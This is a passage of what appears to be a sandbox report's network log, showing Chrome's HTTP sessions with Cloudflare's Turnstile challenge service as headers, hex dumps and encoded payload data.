                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:09:30 UTC349INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:30 GMT
                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                cf-chl-out: CzgMDO/BwEel+DB7nEC3Dd3/PfMfGjf1dhE=$Jtb4oHRz4NtbQo4y
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd82a55cd00f8b-EWR
                                                                                                                                                                                                                                                2024-10-03 14:09:30 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                                Data Ascii: invalid


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                24192.168.2.649750104.18.95.414436088C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:09:30 UTC815OUTGET /cdn-cgi/challenge-platform/h/g/pat/8ccd8289bc184228/1727964569365/186f8d6e14d4fe0eb3804fd1be46d1535ddfe35c7ad2d6cb8e9dce82775fb104/hz5T_VEh25F25lZ HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ha9g5/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:09:30 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:30 GMT
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-10-03 14:09:30 UTC1985INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 47 47 2d 4e 62 68 54 55 5f 67 36 7a 67 45 5f 52 76 6b 62 52 55 31 33 66 34 31 78 36 30 74 62 4c 6a 70 33 4f 67 6e 64 66 73 51 51 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                                                                                                                                Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gGG-NbhTU_g6zgE_RvkbRU13f41x60tbLjp3OgndfsQQAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                                                                                                                                2024-10-03 14:09:30 UTC1INData Raw: 4a
                                                                                                                                                                                                                                                Data Ascii: J


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                25192.168.2.649751104.18.95.414436088C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:09:31 UTC786OUTGET /cdn-cgi/challenge-platform/h/g/i/8ccd8289bc184228/1727964569367/0T9ApzVXXVphPFj HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ha9g5/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:09:31 UTC170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:31 GMT
                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                Content-Length: 61
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd82ac3fb1430f-EWR
                                                                                                                                                                                                                                                2024-10-03 14:09:31 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 37 08 02 00 00 00 e2 cb df 80 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                Data Ascii: PNGIHDR 7IDAT$IENDB`


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                26192.168.2.649752104.18.95.414436088C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:09:32 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8ccd8289bc184228/1727964569367/0T9ApzVXXVphPFj HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:09:32 UTC170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:32 GMT
                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                Content-Length: 61
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd82b42b8841a3-EWR
                                                                                                                                                                                                                                                2024-10-03 14:09:32 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 37 08 02 00 00 00 e2 cb df 80 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                Data Ascii: PNGIHDR 7IDAT$IENDB`


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                27192.168.2.649753104.18.95.414436088C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:09:32 UTC928OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1300389161:1727962023:QSoqQkjz0PpYr1szVnKI7X7Fbyyo_-jod5ykE5mZtpI/8ccd8289bc184228/6e64b4d206e3507 HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 32608
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                CF-Challenge: 6e64b4d206e3507
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ha9g5/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:09:32 UTC16384OUTData Raw: 76 5f 38 63 63 64 38 32 38 39 62 63 31 38 34 32 32 38 3d 38 77 30 64 7a 55 33 6e 24 73 24 63 65 25 32 62 58 41 6c 41 56 73 30 55 73 33 72 41 75 64 72 32 63 44 33 7a 2b 41 30 4d 2b 6e 33 54 41 78 32 6d 78 33 70 6e 64 55 54 24 78 6e 76 33 6c 63 44 41 6d 6f 2b 69 4d 33 39 41 38 65 41 74 41 78 46 24 41 70 64 66 38 4f 71 31 64 33 58 72 41 55 4d 32 33 79 53 41 24 41 79 41 38 4d 33 55 41 6e 58 59 32 4d 41 2d 44 49 75 41 5a 71 24 41 68 6c 45 72 2b 42 48 62 41 45 4d 41 4c 48 30 49 45 4e 64 41 63 66 41 41 59 4e 33 4d 76 64 33 59 41 56 65 41 69 4e 24 73 74 79 66 6f 76 64 33 56 55 73 51 4c 76 39 78 4b 68 58 4d 68 74 6f 78 6a 58 32 49 6c 45 32 63 59 6e 2b 63 43 55 64 41 56 41 30 65 62 76 43 77 77 41 6d 72 38 48 63 73 66 31 76 42 34 6e 41 55 4c 67 39 58 68 6b 6e 59 5a
                                                                                                                                                                                                                                                Data Ascii: v_8ccd8289bc184228=8w0dzU3n$s$ce%2bXAlAVs0Us3rAudr2cD3z+A0M+n3TAx2mx3pndUT$xnv3lcDAmo+iM39A8eAtAxF$Apdf8Oq1d3XrAUM23ySA$AyA8M3UAnXY2MA-DIuAZq$AhlEr+BHbAEMALH0IENdAcfAAYN3Mvd3YAVeAiN$styfovd3VUsQLv9xKhXMhtoxjX2IlE2cYn+cCUdAVA0ebvCwwAmr8Hcsf1vB4nAULg9XhknYZ
                                                                                                                                                                                                                                                2024-10-03 14:09:32 UTC16224OUTData Raw: 6c 75 33 62 54 24 6a 4d 30 56 32 64 78 58 63 74 6f 5a 32 41 41 73 4e 37 45 4f 24 64 77 73 32 66 33 41 41 41 39 36 56 72 6d 4d 76 52 41 44 6f 32 41 30 33 33 4f 33 36 41 63 41 33 76 41 64 58 37 62 33 44 33 64 41 57 41 4b 67 33 31 41 53 67 44 32 33 58 41 53 41 78 37 41 58 41 6b 61 78 4a 41 58 41 2b 41 2b 7a 33 73 41 66 64 33 79 64 49 64 38 64 41 4e 41 43 41 41 79 4e 78 41 61 41 62 4d 33 41 33 72 41 58 4f 2b 30 33 34 41 38 32 33 76 41 32 41 2b 32 41 76 33 7a 41 73 41 33 32 41 46 41 4c 4d 63 35 41 2b 41 73 41 6d 6e 41 32 41 62 32 4d 33 33 36 41 2d 45 33 41 41 72 4d 76 4d 63 41 33 67 41 30 66 66 39 41 76 44 58 64 2b 78 41 4d 41 4b 24 2b 76 41 55 24 56 43 55 4c 41 47 41 4b 24 78 24 41 4d 4d 56 32 73 4d 64 66 41 6f 7a 45 4c 41 69 41 42 32 76 44 63 5a 41 53 32 41
                                                                                                                                                                                                                                                Data Ascii: lu3bT$jM0V2dxXctoZ2AAsN7EO$dws2f3AAA96VrmMvRADo2A033O36AcA3vAdX7b3D3dAWAKg31ASgD23XASAx7AXAkaxJAXA+A+z3sAfd3ydId8dANACAAyNxAaAbM3A3rAXO+034A823vA2A+2Av3zAsA32AFALMc5A+AsAmnA2Ab2M336A-E3AArMvMcA3gA0ff9AvDXd+xAMAK$+vAU$VCULAGAK$x$AMMV2sMdfAozELAiAB2vDcZAS2A
                                                                                                                                                                                                                                                2024-10-03 14:09:33 UTC300INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:33 GMT
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                Content-Length: 26828
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-chl-gen: dXSDS9r/92cyz+E4OOMTmONK51sn+w8sTQ2VJS8k6xFoVc1mKRUPJPce4Cpg8pVOQfTf3TuKvSAHKsOH$3cBzSq6N6v4Slhzt
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd82b479cc0cae-EWR
                                                                                                                                                                                                                                                2024-10-03 14:09:33 UTC1069INData Raw: 6a 58 36 4f 56 33 57 4f 66 48 52 34 56 6e 78 32 67 70 56 32 64 34 52 31 6b 70 53 56 6e 35 61 59 6d 61 4e 38 71 35 43 6d 63 49 57 6b 6c 59 69 49 63 35 47 4f 74 49 61 57 76 4c 35 2f 65 4b 7a 45 6e 37 48 49 66 34 6d 32 69 59 6d 57 70 4e 43 48 6a 39 43 79 31 4b 37 52 32 4e 61 4c 6a 4a 6d 55 70 62 57 77 72 35 75 35 73 74 36 65 70 61 48 67 77 36 43 38 75 61 66 46 76 74 36 36 70 4f 69 73 7a 71 7a 49 77 72 50 52 79 75 75 36 36 2f 43 2b 32 65 2f 55 7a 37 2f 64 31 39 48 47 34 50 77 4c 79 4f 72 34 45 65 6e 39 46 63 33 66 46 4f 2f 6c 31 51 6a 6d 46 39 33 30 32 75 7a 71 41 69 58 77 2b 67 49 44 4b 69 41 69 4a 42 6b 73 4a 75 73 62 42 69 38 73 41 54 49 6d 38 66 66 78 4e 69 55 53 50 7a 6f 39 49 55 4d 62 49 78 37 38 48 55 45 6a 52 30 4d 65 41 7a 73 69 49 55 6b 61 43 78 41
                                                                                                                                                                                                                                                Data Ascii: jX6OV3WOfHR4Vnx2gpV2d4R1kpSVn5aYmaN8q5CmcIWklYiIc5GOtIaWvL5/eKzEn7HIf4m2iYmWpNCHj9Cy1K7R2NaLjJmUpbWwr5u5st6epaHgw6C8uafFvt66pOiszqzIwrPRyuu66/C+2e/Uz7/d19HG4PwLyOr4Een9Fc3fFO/l1QjmF9302uzqAiXw+gIDKiAiJBksJusbBi8sATIm8ffxNiUSPzo9IUMbIx78HUEjR0MeAzsiIUkaCxA
                                                                                                                                                                                                                                                2024-10-03 14:09:33 UTC1369INData Raw: 4c 53 30 6b 71 79 56 66 6e 65 39 76 35 39 39 6d 37 2b 64 79 59 65 70 68 37 2b 64 71 63 6e 4a 69 36 75 4d 79 61 61 7a 6c 4b 66 57 32 36 2b 5a 79 39 79 31 79 4a 36 2b 76 64 37 59 35 65 58 45 6f 75 48 42 78 2b 7a 4c 72 4b 7a 76 30 66 50 48 38 50 65 76 77 75 66 57 7a 72 76 54 74 4c 69 2f 32 4f 7a 4c 77 2f 62 64 38 63 66 33 43 4d 4b 2b 31 51 67 4d 7a 73 33 76 7a 2b 48 64 38 52 6a 73 32 52 77 63 48 68 73 63 49 65 44 34 47 66 41 59 42 52 41 64 38 51 48 36 4a 4f 59 46 35 4f 6a 77 2b 52 49 4b 2f 54 4c 73 4c 77 50 72 39 51 33 38 42 6a 6b 4e 43 52 62 34 2f 67 4d 64 48 78 6f 49 4f 79 49 32 44 44 78 4d 42 77 4d 61 54 46 41 54 45 6a 51 50 4a 69 49 30 4e 44 41 2f 4f 43 31 64 47 68 55 30 57 7a 46 58 5a 7a 63 79 4f 7a 64 59 52 47 70 41 5a 7a 39 72 58 6d 4a 44 51 47 74 5a
                                                                                                                                                                                                                                                Data Ascii: LS0kqyVfne9v599m7+dyYeph7+dqcnJi6uMyaazlKfW26+Zy9y1yJ6+vd7Y5eXEouHBx+zLrKzv0fPH8PevwufWzrvTtLi/2OzLw/bd8cf3CMK+1QgMzs3vz+Hd8Rjs2RwcHhscIeD4GfAYBRAd8QH6JOYF5Ojw+RIK/TLsLwPr9Q38BjkNCRb4/gMdHxoIOyI2DDxMBwMaTFATEjQPJiI0NDA/OC1dGhU0WzFXZzcyOzdYRGpAZz9rXmJDQGtZ
                                                                                                                                                                                                                                                2024-10-03 14:09:33 UTC1369INData Raw: 36 52 6e 4b 33 43 70 61 43 78 78 6e 2b 48 78 72 58 49 72 72 66 45 78 72 71 78 76 64 4b 2b 74 71 66 47 77 73 76 52 70 64 79 72 79 39 61 7a 35 4b 32 74 35 73 54 6f 70 65 4c 56 32 62 71 37 72 64 79 2b 36 65 2f 73 35 74 58 31 36 38 6a 33 38 38 66 53 75 39 50 59 37 74 32 2f 41 50 44 41 78 4e 66 67 44 4f 4c 56 31 51 77 4c 44 50 37 62 43 51 48 50 35 68 6e 53 38 42 58 75 33 4f 55 4d 48 4e 38 66 2f 66 6e 57 32 2f 33 65 32 68 67 4b 48 75 6e 73 36 44 41 46 48 54 51 7a 37 66 55 6f 39 44 6f 73 4d 78 6b 73 50 52 63 4f 48 51 34 4e 48 68 41 5a 51 68 77 6d 46 6b 77 70 46 77 35 48 4f 6a 34 66 49 43 6f 78 44 30 4d 68 55 45 73 36 57 6c 41 74 58 46 67 73 4e 79 41 34 50 56 4e 43 4a 46 35 6c 4a 53 6b 37 4a 48 42 4a 63 6d 31 4b 61 54 31 51 58 7a 42 43 4e 6c 51 37 5a 32 38 39 61
                                                                                                                                                                                                                                                Data Ascii: 6RnK3CpaCxxn+HxrXIrrfExrqxvdK+tqfGwsvRpdyry9az5K2t5sTopeLV2bq7rdy+6e/s5tX168j388fSu9PY7t2/APDAxNfgDOLV1QwLDP7bCQHP5hnS8BXu3OUMHN8f/fnW2/3e2hgKHuns6DAFHTQz7fUo9DosMxksPRcOHQ4NHhAZQhwmFkwpFw5HOj4fICoxD0MhUEs6WlAtXFgsNyA4PVNCJF5lJSk7JHBJcm1KaT1QXzBCNlQ7Z289a
                                                                                                                                                                                                                                                2024-10-03 14:09:33 UTC1369INData Raw: 43 6c 4a 61 35 68 34 57 32 76 4b 65 35 73 74 4b 53 78 61 4f 75 77 61 76 48 74 4d 58 56 6d 4c 6a 4a 34 4d 47 38 7a 65 54 62 77 4e 48 6f 36 63 53 2f 75 62 6e 6f 31 2b 58 62 78 4f 44 4a 34 73 44 54 35 4f 6a 59 79 63 6e 55 41 41 44 57 77 51 53 36 76 51 45 45 34 63 66 33 32 65 44 46 34 74 66 4c 45 51 7a 4c 38 2b 49 51 46 66 6a 7a 35 65 6e 53 32 75 6b 65 2f 42 59 55 38 76 37 36 47 43 59 45 39 51 6e 69 42 69 6e 71 41 65 58 39 45 68 30 51 36 67 63 55 4e 67 59 52 4f 44 77 54 45 30 42 42 2f 6a 35 45 51 66 77 63 4a 69 41 69 47 55 41 65 43 67 70 4a 4f 46 49 62 53 43 49 51 55 79 77 56 4e 43 74 4d 4d 44 56 4c 4f 6c 70 54 59 78 30 68 4e 44 6b 30 58 69 41 37 4b 32 70 6e 52 53 70 49 52 55 45 73 54 45 6c 46 63 6e 52 75 62 56 49 33 53 55 74 33 66 6e 74 5a 64 47 56 6a 59 58
                                                                                                                                                                                                                                                Data Ascii: ClJa5h4W2vKe5stKSxaOuwavHtMXVmLjJ4MG8zeTbwNHo6cS/ubno1+XbxODJ4sDT5OjYycnUAADWwQS6vQEE4cf32eDF4tfLEQzL8+IQFfjz5enS2uke/BYU8v76GCYE9QniBinqAeX9Eh0Q6gcUNgYRODwTE0BB/j5EQfwcJiAiGUAeCgpJOFIbSCIQUywVNCtMMDVLOlpTYx0hNDk0XiA7K2pnRSpIRUEsTElFcnRubVI3SUt3fntZdGVjYX
                                                                                                                                                                                                                                                2024-10-03 14:09:33 UTC1369INData Raw: 79 37 6d 50 7a 62 75 79 6b 49 65 6c 74 4c 48 51 75 4b 6d 70 32 74 33 58 71 37 62 53 74 37 7a 53 77 65 54 44 75 36 4f 33 74 37 2f 66 77 4f 54 6f 71 72 4c 51 77 74 50 58 32 64 62 6f 73 37 76 4f 31 37 7a 71 38 73 44 74 77 77 4c 76 35 73 53 37 32 65 6a 6c 42 65 7a 64 34 50 34 49 46 4f 72 56 47 42 66 58 46 77 51 54 31 65 6e 38 2f 42 44 36 45 4f 4c 37 44 69 45 44 34 67 4d 72 34 69 30 41 4a 50 6b 61 41 53 49 69 4c 43 4d 33 4d 68 49 36 4e 66 67 4c 2b 77 77 71 46 42 56 44 48 42 4d 62 4b 45 67 52 4a 30 67 5a 53 43 4a 4f 52 6b 45 2b 4c 53 67 71 44 56 46 41 54 53 6c 61 4e 44 6f 37 54 6c 4d 2f 4c 55 4a 69 57 44 55 6e 61 44 38 2f 62 47 77 72 61 31 30 2f 4c 55 70 69 52 6d 68 57 55 32 63 76 4d 45 73 36 4e 31 56 4f 67 45 46 2b 65 47 52 65 5a 32 56 57 56 6d 47 4b 68 6f 74
                                                                                                                                                                                                                                                Data Ascii: y7mPzbuykIeltLHQuKmp2t3Xq7bSt7zSweTDu6O3t7/fwOToqrLQwtPX2dbos7vO17zq8sDtwwLv5sS72ejlBezd4P4IFOrVGBfXFwQT1en8/BD6EOL7DiED4gMr4i0AJPkaASIiLCM3MhI6NfgL+wwqFBVDHBMbKEgRJ0gZSCJORkE+LSgqDVFATSlaNDo7TlM/LUJiWDUnaD8/bGwra10/LUpiRmhWU2cvMEs6N1VOgEF+eGReZ2VWVmGKhot
                                                                                                                                                                                                                                                2024-10-03 14:09:33 UTC1369INData Raw: 4b 6d 73 6b 4e 58 42 30 4c 53 55 30 4a 58 57 30 74 54 63 76 64 2f 43 35 5a 2f 6a 34 61 4c 45 32 4f 50 68 37 65 2f 46 79 4b 7a 78 33 65 7a 51 73 4f 79 78 38 75 37 77 37 4e 6e 37 33 67 4b 38 41 50 32 2b 2f 4f 50 58 31 2b 6a 71 7a 41 7a 61 44 41 76 4c 44 4f 41 42 39 77 50 71 2b 75 73 4a 36 42 66 57 43 76 44 62 31 4e 77 53 2b 66 66 64 46 4f 51 45 4b 52 6b 6b 44 43 34 61 4a 75 51 7a 4c 77 59 49 38 53 67 49 2b 76 67 73 48 51 67 38 4b 67 41 32 2b 6a 38 6d 4e 30 59 33 50 7a 63 59 4e 67 68 48 48 54 73 67 44 31 46 52 4e 6c 4e 58 53 45 49 55 4b 31 63 75 4d 53 39 4e 4d 6c 38 67 56 46 39 6e 5a 32 67 70 52 6a 68 74 61 45 6b 71 59 46 73 39 64 47 39 57 59 7a 4a 34 4f 56 5a 49 66 58 68 5a 66 59 46 73 61 34 4b 44 66 49 49 2f 65 47 70 6c 58 33 5a 4d 58 56 32 4f 55 45 6c 6b
                                                                                                                                                                                                                                                Data Ascii: KmskNXB0LSU0JXW0tTcvd/C5Z/j4aLE2OPh7e/FyKzx3ezQsOyx8u7w7Nn73gK8AP2+/OPX1+jqzAzaDAvLDOAB9wPq+usJ6BfWCvDb1NwS+ffdFOQEKRkkDC4aJuQzLwYI8SgI+vgsHQg8KgA2+j8mN0Y3PzcYNghHHTsgD1FRNlNXSEIUK1cuMS9NMl8gVF9nZ2gpRjhtaEkqYFs9dG9WYzJ4OVZIfXhZfYFsa4KDfII/eGplX3ZMXV2OUElk
                                                                                                                                                                                                                                                2024-10-03 14:09:33 UTC1369INData Raw: 62 63 73 62 6d 77 33 73 75 74 73 65 54 50 73 61 2f 6f 34 61 53 2b 36 39 66 4a 77 65 2b 77 36 37 2f 7a 37 39 58 41 38 65 50 33 78 50 76 33 38 38 30 41 77 50 76 57 42 63 54 32 41 77 6b 45 39 39 34 4d 39 77 6a 59 45 65 55 49 33 42 58 39 30 4f 6b 5a 37 52 44 6e 47 2f 48 74 37 43 45 4d 45 78 38 6b 35 42 7a 31 4b 65 67 6f 39 79 33 73 47 50 67 71 48 43 51 42 4e 66 51 6b 41 54 63 6b 4c 41 51 37 4b 43 63 37 51 52 59 4f 46 30 51 61 50 42 5a 48 4e 45 51 56 53 7a 59 4a 49 31 45 6d 51 43 64 56 51 45 41 68 57 52 6c 51 4b 31 5a 49 58 43 39 68 4e 6b 49 74 59 31 41 32 4f 47 6c 55 59 32 64 74 61 47 77 39 62 31 78 77 52 33 55 31 55 6b 46 35 59 6a 56 4f 65 32 68 34 54 49 46 38 54 6c 57 45 63 48 78 59 67 6e 52 71 58 59 31 4e 6a 47 4f 52 55 58 4a 69 6c 4a 42 31 6b 35 6c 5a 69
                                                                                                                                                                                                                                                Data Ascii: bcsbmw3sutseTPsa/o4aS+69fJwe+w67/z79XA8eP3xPv3880AwPvWBcT2AwkE994M9wjYEeUI3BX90OkZ7RDnG/Ht7CEMEx8k5Bz1Kego9y3sGPgqHCQBNfQkATckLAQ7KCc7QRYOF0QaPBZHNEQVSzYJI1EmQCdVQEAhWRlQK1ZIXC9hNkItY1A2OGlUY2dtaGw9b1xwR3U1UkF5YjVOe2h4TIF8TlWEcHxYgnRqXY1NjGORUXJilJB1k5lZi
                                                                                                                                                                                                                                                2024-10-03 14:09:33 UTC1369INData Raw: 33 30 39 37 43 31 75 66 6e 71 4d 69 68 36 61 79 34 72 2b 33 62 30 50 44 7a 74 4d 54 31 38 76 50 72 78 39 76 51 2f 64 2f 2b 39 75 30 41 39 4d 50 54 34 77 62 64 41 4e 58 70 34 4d 66 61 43 73 72 4b 79 76 33 50 2f 75 51 44 42 4f 76 33 46 78 63 67 37 79 44 66 37 4f 30 55 33 78 66 36 4a 51 63 54 36 67 73 69 41 67 45 51 42 4f 6f 4e 4d 67 4d 75 4b 44 6b 48 4f 7a 63 5a 45 54 34 6f 49 54 77 2b 4c 6a 34 6a 48 51 63 6e 50 68 34 65 4c 43 41 48 4b 6b 34 66 53 6b 52 55 4d 31 64 54 4e 45 4e 61 52 44 31 59 4f 45 70 61 50 6d 4d 6a 51 31 6f 36 4e 30 67 38 49 30 4e 71 4f 32 5a 67 63 47 56 30 50 6d 41 76 4e 45 74 7a 56 32 63 37 66 57 68 53 54 34 42 72 51 32 4f 44 65 58 4f 49 67 34 4e 56 56 6e 78 49 66 32 4f 4e 62 6c 42 54 63 6c 56 6f 6c 6f 52 59 61 6d 79 63 58 46 39 2f 6d 33
